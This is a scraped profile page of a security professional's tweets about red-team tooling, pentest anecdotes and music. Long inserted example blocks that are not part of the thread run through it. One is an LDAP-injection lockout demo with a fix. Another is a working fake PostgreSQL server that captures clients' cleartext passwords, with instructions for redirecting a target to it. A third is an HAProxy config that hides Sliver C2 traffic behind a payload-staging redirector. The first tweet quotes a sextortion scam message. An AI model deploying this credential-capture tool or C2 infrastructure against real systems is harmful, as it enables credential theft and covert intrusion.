C Sto
@C__Sto

2.3K posts

Sarcastic wannabe hacker. Professional ‘I wonder what would happen if I’-er

Perth · Joined April 2009
454 Following · 626 Followers

C Sto @C__Sto
@xyantix Hey. I am a programmer who hacked your device's operating system. I have been observing you for a few months already. The point is that you have been infected with my virus through the adult website that you visited. If you are not familiar with this, I will explain. Trojan vi

CJ @xyantix
STOP👏SUBMITTING👏CREDS👏FROM👏STEALER 👏LOGS👏TO👏BOUNTY👏PROGRAMS

C Sto @C__Sto
@TracketPacer Not whole network, but also managed to uninstall iptables on a colo host (different country) after resetting all the rules, so no egress or ingress allowed at all

TracketPacer @TracketPacer
tell me your funniest “i took the network down” stories? i need a laugh today

C Sto @C__Sto
@TracketPacer Was poking at a login page on a pentest, thought it was weird that special characters in the username made the response longer sometimes. Thought I could enum user accounts with it. Turns out it was ldap injection, so I was locking out all accounts starting with A… B…

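The lockout mechanism behind that story, as an added example that is not code from the thread: the login form feeds the username straight into an LDAP filter, the app then tries a bind as every account the filter matched, and an unescaped `*` makes "a*" match every account starting with a, so each wrong-password probe burns a failed-bind count on all of them (and the larger result set is why the response got longer). The same code shows the fix, RFC 4515 filter escaping. The directory contents, the lockout threshold and the probe string are constructed for the demo.

```python
"""Why a wildcard in a login form locks out many accounts at once.

Added example, not code from the thread. It models the lookup-then-bind
pattern behind the tweet: the app searches the directory for the submitted
username, then tries a bind as every DN the search returned. The directory
contents and the lockout threshold are constructed for the demo.
"""
import re
from collections import Counter

# Constructed sample directory (uid -> password); not real data.
DIRECTORY = {
    "alice": "correct horse",
    "adam": "battery staple",
    "anna": "hunter2",
    "bob": "letmein",
    "carol": "xyzzy",
}
LOCKOUT_THRESHOLD = 3  # failed binds before an account locks (assumed policy)

# RFC 4515 section 3: characters that must be hex-escaped inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input so the filter matches it literally."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter(username: str, escape: bool) -> str:
    """The app's lookup filter; the vulnerable variant concatenates raw input."""
    value = escape_filter_value(username) if escape else username
    return f"(uid={value})"


def _assertion_to_regex(assertion: str) -> str:
    """Translate a filter value to a regex: an unescaped '*' is a wildcard,
    a '\\XX' hex escape stands for one literal character."""
    parts, i = [], 0
    while i < len(assertion):
        ch = assertion[i]
        if ch == "\\" and i + 2 < len(assertion):
            parts.append(re.escape(chr(int(assertion[i + 1:i + 3], 16))))
            i += 3
        elif ch == "*":
            parts.append(".*")
            i += 1
        else:
            parts.append(re.escape(ch))
            i += 1
    return "".join(parts)


def search(ldap_filter: str) -> list:
    """Toy evaluator for '(uid=<value>)' filters over DIRECTORY.
    More matches means a longer response, which was the tell in the tweet."""
    m = re.fullmatch(r"\(uid=(.*)\)", ldap_filter)
    if m is None:
        return []
    regex = _assertion_to_regex(m.group(1))
    return [uid for uid in DIRECTORY if re.fullmatch(regex, uid)]


def attempt_login(username: str, password: str, escape: bool, failures: Counter) -> bool:
    """Lookup-then-bind: every matched account gets a bind attempt, and every
    failed bind counts towards that account's lockout."""
    success = False
    for uid in search(build_filter(username, escape)):
        if DIRECTORY[uid] == password:
            success = True
        else:
            failures[uid] += 1
    return success


def locked_accounts(failures: Counter) -> set:
    return {uid for uid, n in failures.items() if n >= LOCKOUT_THRESHOLD}


def demo(escape: bool, probe: str = "a*") -> set:
    """Replay the tweet: a few probes with a wildcard username and a bogus password."""
    failures = Counter()
    for _ in range(LOCKOUT_THRESHOLD):
        attempt_login(probe, "not-the-password", escape, failures)
    return locked_accounts(failures)


if __name__ == "__main__":
    print("raw input:    ", sorted(demo(escape=False)))  # ['adam', 'alice', 'anna']
    print("escaped input:", sorted(demo(escape=True)))   # []
```

Real-world check before poking further: if a single request with `*` in the username visibly changes the response, stop and confirm the lockout policy with the client, because every probe after that is a denial of service against everyone the wildcard matches.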
C Sto @C__Sto
@mcohmi Make sure you check out master for extension stuff - recent changes use bof arg parsing which opens up the ability to send files as arguments etc

Ohm-I (Oh My) @mcohmi
Trying to write Sliver extensions in Vlang and got stuck on a problem for two days. Went to the bar, came back, and got it in 5 minutes. 🙃🙃🙃

Graham Helton (too much for zblock)
Obscure question but does anyone know of a better way to search for files on a large linux system? I'm looking for something like `(rip)grep -ri "word_to_search_for"` but takes input from a wordlist and has some sort of logging of output.

ss23 @ss2342
Given a SCCM/SMS/ConfigMgr backup (including the SiteDBServer, SiteServer, etc), what is the best way to decrypt the credentials stored in the database? Google seems to suggest these are encrypted with DPAPI, but that seems like then you wouldn't be able to restore from backup?

C Sto @C__Sto
@seventhsec @vortexau +1 on The Alchemist, though it’s pretty short, it’s one of the few books I will think ‘I should read that again’ every few years

vortex @vortexau
If you needed to select a fiction book to read for a few hours a day, what would you pick? Please don't suggest 1984 or similar (read them). Nor fantasy. Sci-fi is OK. Open to short stories, poetry and similar. Anything positive and uplifting. No idea where to start.

C Sto @C__Sto
@nnwakelam if it's the groove you like, there is a bunch of female vox gogo inspired tracks around - obvious ones that come to mind: JLo - Get Right, Amerie - 1 Thing, Beyonce - Green Light, pretty much every Backyard Band cover of R&B/pop tunes; otherwise 00's pop all sounded pretty similar lol

Nate @nnwakelam
song recommendations that have this kind of energy - looking for suggestions open.spotify.com/track/3U5JVgI2… Toxic - Britney Spears I wish I was a Punk Rocker - Sandi Thom

C Sto @C__Sto
@Ne0nd0g I wonder if there is anywhere in the runtime that exposes go functions as callbacks to OS routines - might be a good place to figure out the least painful way of doing it.

Russel Van Tuyl @Ne0nd0g
@C__Sto I did consider reaching out to you specifically to look at using ASM. Not off the table, but want to get things fully functional with cgo before going that route.

Russel Van Tuyl @Ne0nd0g
Finally got a proof of concept COFF & BOF loader working all in Go. There’s still a lot of work to be done though like take arguments, handle more relocation types, and implement the rest of the Beacon functions. Currently works for TrustedSec’s whoami BOF.

C Sto @C__Sto
@Ne0nd0g I think you may be able to set up functions with a different ABI if you use asm, though I’m not sure I’d wish that on anyone even if it worked

Russel Van Tuyl @Ne0nd0g
I ended up having to use cgo to export Go functions so I can call them from the COFF. I’m not too happy with that. Another option is to load a compatibility DLL that exposes the needed Beacon functions.

C Sto @C__Sto
@techspence Fun answer: RE exe, figure out crypto ctf Fast answer: put exe and password file in a sandbox and listen on the relevant db ports for incoming connections

spencer @techspence
Say you're on an endpoint that has an executable on it. The exe, when run, grabs an encrypted password from a config file on a file share and then uses it to connect to a database. The traffic is encrypted. Thoughts on obtaining the plaintext password?

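What the "fast answer" looks like in practice, as an added example that is not code from the thread: a fake PostgreSQL server to run inside the sandbox on the port the executable connects to. It answers the client's SSLRequest with 'N', reads the StartupMessage and then asks for AuthenticationCleartextPassword, which a client running with libpq's default sslmode=prefer (or weaker) answers in the clear; a client built with sslmode=require or stronger disconnects instead, and then you are back to the "fun answer". Message layouts follow the PostgreSQL v3 wire protocol documentation; the listening port, the scripted client and the sample credentials are assumptions for the offline demo. Other databases need the same trick with their own handshake (MySQL and MSSQL negotiate TLS after the server greeting too).

```python
"""Fake PostgreSQL server that captures the password the client sends.

Added example, not code from the thread. Run it inside the sandbox on the
port the executable connects to: it answers the SSLRequest with 'N', reads
the StartupMessage and asks for AuthenticationCleartextPassword, which a
client with sslmode=prefer (libpq's default) or lower answers in the clear.
A client using sslmode=require or stronger disconnects instead. Message
layouts follow the PostgreSQL v3 protocol docs; the scripted client and the
sample credentials are assumptions for the offline demo.
"""
import socket
import struct
import threading

SSL_REQUEST_CODE = 80877103   # magic "version" number of an SSLRequest
PROTOCOL_V3 = 196608          # protocol 3.0


def recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def parse_startup_params(payload: bytes) -> dict:
    """StartupMessage body after its length: int32 version, then
    key\\0value\\0 pairs ending with a lone \\0."""
    (version,) = struct.unpack("!I", payload[:4])
    if version != PROTOCOL_V3:
        raise ValueError(f"unexpected protocol version {version}")
    items = payload[4:].split(b"\x00")
    params, i = {}, 0
    while i + 1 < len(items) and items[i]:
        params[items[i].decode()] = items[i + 1].decode()
        i += 2
    return params


def capture_credentials(conn) -> tuple:
    """Server side of the handshake on an accepted socket; returns (params, password)."""
    length, code = struct.unpack("!II", recv_exact(conn, 8))
    if code == SSL_REQUEST_CODE:
        conn.sendall(b"N")            # "no TLS here"; a lenient client retries in plaintext
        length, code = struct.unpack("!II", recv_exact(conn, 8))
    payload = struct.pack("!I", code) + recv_exact(conn, length - 8)
    params = parse_startup_params(payload)
    conn.sendall(b"R" + struct.pack("!II", 8, 3))   # AuthenticationCleartextPassword
    if recv_exact(conn, 1) != b"p":
        raise ValueError("expected a PasswordMessage")
    (plen,) = struct.unpack("!I", recv_exact(conn, 4))
    password = recv_exact(conn, plen - 4).rstrip(b"\x00").decode()
    # ErrorResponse (28P01 invalid_password) so the client gives up cleanly.
    fields = b"SFATAL\x00C28P01\x00Mpassword authentication failed\x00\x00"
    conn.sendall(b"E" + struct.pack("!I", 4 + len(fields)) + fields)
    return params, password


def listen_once(host: str = "0.0.0.0", port: int = 5432) -> tuple:
    """Sandbox use: bind the DB port and wait for the target executable to connect."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            return peer, capture_credentials(conn)


def scripted_client(sock, user: str, database: str, password: str, try_ssl: bool) -> None:
    """Stand-in for the target exe: behaves like libpq with sslmode=prefer."""
    if try_ssl:
        sock.sendall(struct.pack("!II", 8, SSL_REQUEST_CODE))
        if recv_exact(sock, 1) != b"N":
            raise RuntimeError("demo server should refuse TLS")
    body = struct.pack("!I", PROTOCOL_V3) + f"user\x00{user}\x00database\x00{database}\x00\x00".encode()
    sock.sendall(struct.pack("!I", 4 + len(body)) + body)
    tag, (_, auth_code) = recv_exact(sock, 1), struct.unpack("!II", recv_exact(sock, 8))
    if tag != b"R" or auth_code != 3:
        raise RuntimeError("expected AuthenticationCleartextPassword")
    pw = password.encode() + b"\x00"
    sock.sendall(b"p" + struct.pack("!I", 4 + len(pw)) + pw)
    recv_exact(sock, 1)                                   # 'E'
    (elen,) = struct.unpack("!I", recv_exact(sock, 4))
    recv_exact(sock, elen - 4)                            # drain the ErrorResponse


def demo(user="svc_app", database="prod", password="Sup3rS3cret!", try_ssl=True) -> tuple:
    """Run server and client over a socketpair, no network or sandbox needed."""
    server_end, client_end = socket.socketpair()
    result = {}
    worker = threading.Thread(target=lambda: result.update(captured=capture_credentials(server_end)))
    worker.start()
    scripted_client(client_end, user, database, password, try_ssl)
    worker.join()
    server_end.close()
    client_end.close()
    return result["captured"]


if __name__ == "__main__":
    params, pw = demo()
    print(f"user={params['user']} database={params['database']} password={pw}")
```

In the sandbox, point the hostname the executable resolves at the listener (hosts file or DNS) and call `listen_once()` instead of `demo()`; the returned params also give you the user and database name, which is useful even when the client refuses to downgrade.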
C Sto @C__Sto
@ImposeCost This tweet has the same energy as ‘knives also get used to murder, why not ban those’

C Sto @C__Sto
@ss2342 This could be a stock image for working on PCB’s

ss23 @ss2342
Cutting up my Wii so there's less super smash bros melee in the world

C Sto @C__Sto
@lpha3ch0 Disagree. Cater it to the audience, but usually you are prioritising coverage during the engagement. If there is a question about what can be done with xss, there is plenty of reading material already around. If they want a poc, it should be considered extra.

Steve Campbell @lpha3ch0
Note to junior pentesters: when you report XSS, showing a popup is only the first step, not the final poc. If you’re not putting in the effort to show the impact with a poc that harvests credentials, executes CSRF, etc, you’re failing your customer and making yourself look bad. Try harder. The only time I stop at a popup is if the testing window is ending and I have no other choice. TBH, I’ve made this mistake but I learned from it.

C Sto @C__Sto
@mcohmi @jrozner Caddy is great, but it’s bitten me a few times with not supporting old TLS stacks - HAProxy has been consistently good once you unlock the config logic in your brain

Ohm-I (Oh My) @mcohmi
@jrozner If you only have a single port for egress, then put something like Caddy in front of your Sliver instance and route specific URLs to download the file while everything else gets routed to Sliver. I haven't taken OSEP but these would have been my next steps if it was me.

Joe Rozner @jrozner
That’s a wrap. Did not pass the OSEP exam. Got 80 out of the 100 necessary points. I had lots of trouble with tooling. Some my own and some using tools that do things in a way that’s a little different from metasploit which made it harder. A few observations 1/n

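The single-egress-port layout from that exchange, written as an HAProxy config since that was C Sto's pick over Caddy. This is an added example, not a config from the thread or from the Sliver project: one TLS listener on 443, a path prefix routed to a local file server for the payload download, everything else passed through to Sliver's HTTPS listener. The paths, ports and certificate location are assumptions, as is the need to admit TLS 1.0 clients (that is the "old TLS stacks" point; drop `ssl-min-ver` if your implants speak modern TLS).

```haproxy
defaults
    mode http
    timeout connect 5s
    timeout client  60s
    timeout server  60s

frontend https_in
    # Single exposed port. ssl-min-ver lets old TLS stacks connect (assumed
    # requirement); HAProxy's default minimum is fine otherwise.
    bind :443 ssl crt /etc/haproxy/certs/redirector.pem ssl-min-ver TLSv1.0
    # Only the staging prefix goes to the file server; everything else is C2.
    acl is_staging path_beg /static/
    use_backend staging_files if is_staging
    default_backend sliver_c2

backend staging_files
    # Local plain-HTTP file server holding the payloads (assumed on 8080).
    server files 127.0.0.1:8080

backend sliver_c2
    # Sliver HTTPS listener bound locally (assumed on 8443); it presents a
    # self-signed cert, hence verify none on the backend side.
    server sliver 127.0.0.1:8443 ssl verify none
```

Check it with `haproxy -c -f haproxy.cfg` before reloading, and confirm that a request to `/static/` hits the file server while `/` is answered by Sliver, so the C2 never sees the download traffic and the file server never sees implant traffic.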
C Sto @C__Sto
@ImposeCost I thought it was a pretty lame way to advertise your ‘swag’, but I’m not the target market so was gonna give it a pass. I was very disappointed to discover you use guessy challenges for technical interviews. I don’t disagree with you on the value, I disagree with the execution.

C Sto @C__Sto
@ImposeCost Not very common without a decoder though is it.

C Sto @C__Sto
@ImposeCost BaseN ‘matryoshka doll’ is bad chaldev, sorry. Doubly so in an interview. If the point is to see someone triage the file, just give the file and ask if they have heard of base32 or something.